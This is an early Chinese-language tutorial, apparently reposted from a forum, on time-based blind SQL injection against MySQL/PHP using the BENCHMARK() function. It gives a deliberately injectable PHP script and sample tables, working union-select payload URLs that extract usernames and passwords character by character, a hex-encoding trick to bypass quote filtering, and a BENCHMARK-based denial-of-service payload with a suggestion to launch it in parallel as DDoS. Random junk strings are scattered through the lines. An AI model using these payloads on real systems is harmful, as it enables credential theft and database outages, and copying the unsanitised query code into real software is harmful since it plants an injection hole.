MYSQL中BENCHMARK函数的利用

admin

MYSQL中BENCHMARK函数的利用
0 J1 J7 A3 ?- o7 A& y本文作者：SuperHei
5 R. H% }$ ~3 S7 B1 g* S7 ^* g文章性质：原创
$ U- Y% q" W( x; P; u7 y发布日期：2005-01-02
- u$ |8 k6 ]1 |7 P/ h' d完成日期：2004-07-09
. B& F% B  b' T/ h第一部

利用时间推延进行注射---BENCHMARK函数在注射中的利用

, a* a, z8 U- Z4 s! y一.前言/思路
* H- k6 |: B% B1 N, b0 S" B: k  j
　　如果你看了angel的《SQL Injection with MySQL》一文，你有会发现一般的mysql+php的注射都是通过返回错误信息，和union联合查询替换原来查询语句中的字段而直接输出敏感信息，但是有的时候，主机设置为不显示错误信息：display_errors = Off 而且有的代码中sql查询后只是简单的对查询结果进行判断，而不要求输出查询结果，我们用上面的办法注射将一无所获。我们可以采用时间推延来进行判断注射了。

7 u) n5 y8 j& e  |/ t- x0 @　　本技术的主要思路：通过在构造的语句用加入执行时间推延的函数，如果我们提交的判断是正确的，那么mysql查询时间就出现推延，如果提交的判断是正确，将不会执行时间推延的函数，查询语句将不会出现推延。这样我们就可以进行判断注射。
. Q% O) ^; f; t  k7 t4 ]/ u
二.关于BENCHMARK函数

$ `( }+ }( i  U4 r" Q　　在MySQL参考手册里可以看到如下描叙：
# ?6 G$ x, B: k: g! F4 D* S

--------------------------------------------------------------------------------

BENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户，它报告查询的执行时间。
$ R% @) ~( s& J! b- u  xmysql> select BENCHMARK(1000000,encode("hello","goodbye"));
+----------------------------------------------+
| BENCHMARK(1000000,encode("hello","goodbye")) |
2 O8 }8 ]+ N/ L$ y8 K/ b+----------------------------------------------+
| 0 |
% k+ x- M0 ?9 v5 Y! e" `+----------------------------------------------+
* r. _+ M' @" g% {2 [5 q/ q8 ^3 ~  u1 row in set (4.74 sec)

报告的时间是客户端的经过时间，不是在服务器端的CPU时间。执行BENCHMARK()若干次可能是明智的，并且注意服务器机器的负载有多重来解释结果。

+ ~$ \5 Y+ V' b/ @; A, w; t
--------------------------------------------------------------------------------

* |2 s, T9 {2 }$ u　　只要我们把参数count 设置大点，那么那执行的时间就会变长。下面我们看看在mysql里执行的效果：
& F% Q$ S/ {, j! N2 {
mysql> select md5( 'test' );
+----------------------------------+
| md5( 'test' ) |
: w3 S( L* Z- X; ~+----------------------------------+
| 098f6bcd4621d373cade4e832627b4f6 |
+----------------------------------+
" f2 q+ y, W& u% z7 |$ Y# W1 row in set (0.00 sec) 〈-----------执行时间为0.00 sec

mysql> select benchmark( 500000, md5( 'test' ) );
& ^$ U4 [& Z( m+------------------------------------+
| benchmark( 500000, md5( 'test' ) ) |
: M" [6 p4 _0 Q+------------------------------------+
| 0 |
- c9 u. c) R' W3 x! ^8 }2 S- C, F+------------------------------------+
/ W3 `6 ]! ^9 r5 B% K1 ~1 row in set (6.55 sec) 〈------------执行时间为6.55 sec
! _( k) w- _' a: r0 c4 i+ z

　　由此可以看出使用benchmark执行500000次的时间明显比正常执行时间延长了。
( K( F' M- S# ~3 p3 D
( w) \3 C- _# Q! }# ~3 A三.具体例子
$ q. {! u( F+ D4 R
. O3 `1 W/ s3 e. Q　　首先我们看个简单的php代码：
9 y7 `: M9 p" S8 g; I
3 Q* z8 I/ G( c< ?php
$servername = "localhost";
$dbusername = "root";
1 Z: ~, U! n, Y, S1 g+ J$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "SELECT * FROM article WHERE articleid=$id";
' a8 W/ w) n. H, X$result = mysql_db_query($dbname,$sql);
/ V+ j( }1 \: z3 g1 q$row = mysql_fetch_array($result);
& V. L* f5 U7 [: b) y! V
; e, x. A, N8 I/ m0 l4 Fif (!$row)
{
exit;
}
* T4 J4 W$ k! U?>

1 @' g2 C; V# c; D" o
: d- P5 L  @8 k) k' \　　数据库injection结构和内容如下：
' ?  `6 z. I' i$ ?- h" }8 e2 _4 g( q
# 数据库 : `injection`
#
5 |; _5 D" Q/ J% w
+ D& C/ v3 n! \2 n% R# --------------------------------------------------------

#
* x) k% L8 l. v+ m# 表的结构 `article`
#
% I3 a. A4 y- |: G6 Q: a/ ], ~
. N3 C8 R% T7 r! i0 tCREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
8 B: O- s2 {& S`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
1 }& a; J4 U9 R* kPRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
+ _% I2 G1 p. R) {+ b4 ^# 导出表中的数据 `article`
#
4 [3 R9 _) x" B. h# u5 Z
INSERT INTO `article` VALUES (1, '我是一个不爱读书的孩子', '中国的教育制度真是他妈的落后！如果我当教育部长。我要把所有老师都解雇！操～');
" ]/ N, {9 X0 ~INSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了，你是什么东西啊');

# --------------------------------------------------------

#
& h0 N( ]" L" X! x  ?# 表的结构 `user`
#
; b3 ~- b; u/ Z1 A; ~5 m
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
: D3 r: z$ C  S' ?' M$ B! M`username` varchar(20) NOT NULL default '',
. x% r: S# K+ T& Q5 i& h0 ^! n( r% @`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

4 M5 q$ f4 c3 k. M7 t0 Z3 D#
# 导出表中的数据 `user`
7 Z7 k% d# z% `/ i" }* B0 [#
# r7 Q+ T: n) d% Q% B
0 |1 I; [8 ]$ @2 aINSERT INTO `user` VALUES (1, 'angel', 'mypass');
# Y9 T; B7 E7 Q6 fINSERT INTO `user` VALUES (2, '4ngel', 'mypass2');


　　代码只是对查询结果进行简单的判断是否存在，假设我们已经设置display_errors=Off。我们这里就没办法利用union select的替换直接输出敏感信息(ps:这里不是说我们不利用union，因为在mysql中不支持子查询)或通过错误消息返回不同来判断注射了。我们利用union联合查询插入BENCHMARK函数语句来进行判断注射：

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*

& o4 f0 V+ {, V- M+ ]1 c% I
　　上面语句可以猜userid为1的用户名的第一位字母的ascii码值是是否为97，如果是97，上面的查询将由于benchmark作用而延时。如果不为97，将不回出现延时，这样我们最终可以猜出管理员的用户名和密码了。 大家注意，这里有一个小技巧：在benchmark(500000,md5('test'))中我们使用了'号， 这样是很危险的，因为管理员随便设置下 就可以过滤使注射失败，我们这里test可以是用其他进制表示，如16进制。最终构造如下：

' w! z; O3 s# l4 \/ C5 u8 Z8 d+ ihttp://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*
/ Z& Q( I1 t. u  z
0 R2 }- N' l0 X# S' h
　　执行速度很慢，得到userid为1的用户名的第一位字母的ascii码值是是为97。

　　注意：我们在使用union select事必须知道原来语句查询表里的字段数，以往我们是根据错误消息来判断，我们在union select 1,1,1我们不停的增加1 如果字段数正确将正常返回不会出现错误，而现在不可以使用这个方法了，那我们可以利用benchmark(),我们这样构造 union select benchmark(500000,md5(0x41)) 1,1 我们在增加1的，当字段数正确时就回执行benchmark()出现延时，这样我们就可以判断字段数了。

第二部

利用BENCHMARK函数进行ddos攻击
8 o, q7 c$ o% S
　　其实思路很简单：在BENCHMARK(count,expr) 中 我们只要设置count 就是执行次数足够大的话，就可以造成dos攻击了，如果我们用代理或其他同时提交，就是ddos攻击，估计数据库很快就会挂了。不过前提还是要求可以注射。语句：
1 t2 ?  Q3 S) V* E+ L
' s! p; A9 q1 O( [; ?http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))

# Q0 |$ E4 B0 {( q" O
! f' c4 O; [" |; R; T/ j% G! |小结
) S! C" P: R# T; L
　　本文主要思路来自http://www.ngssoftware.com/papers/HackproofingMySQL.pdf，其实关于利用时间差进行注射在mssql注射里早有应用，只是所利用的函数不同而已（见http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf）。关于mysql+php一般注射的可以参考angel的文章《SQL Injection with MySQL》。
" Y6 a$ F( V9 H- S
/ Q9 R$ B/ O5 k' Q; s- n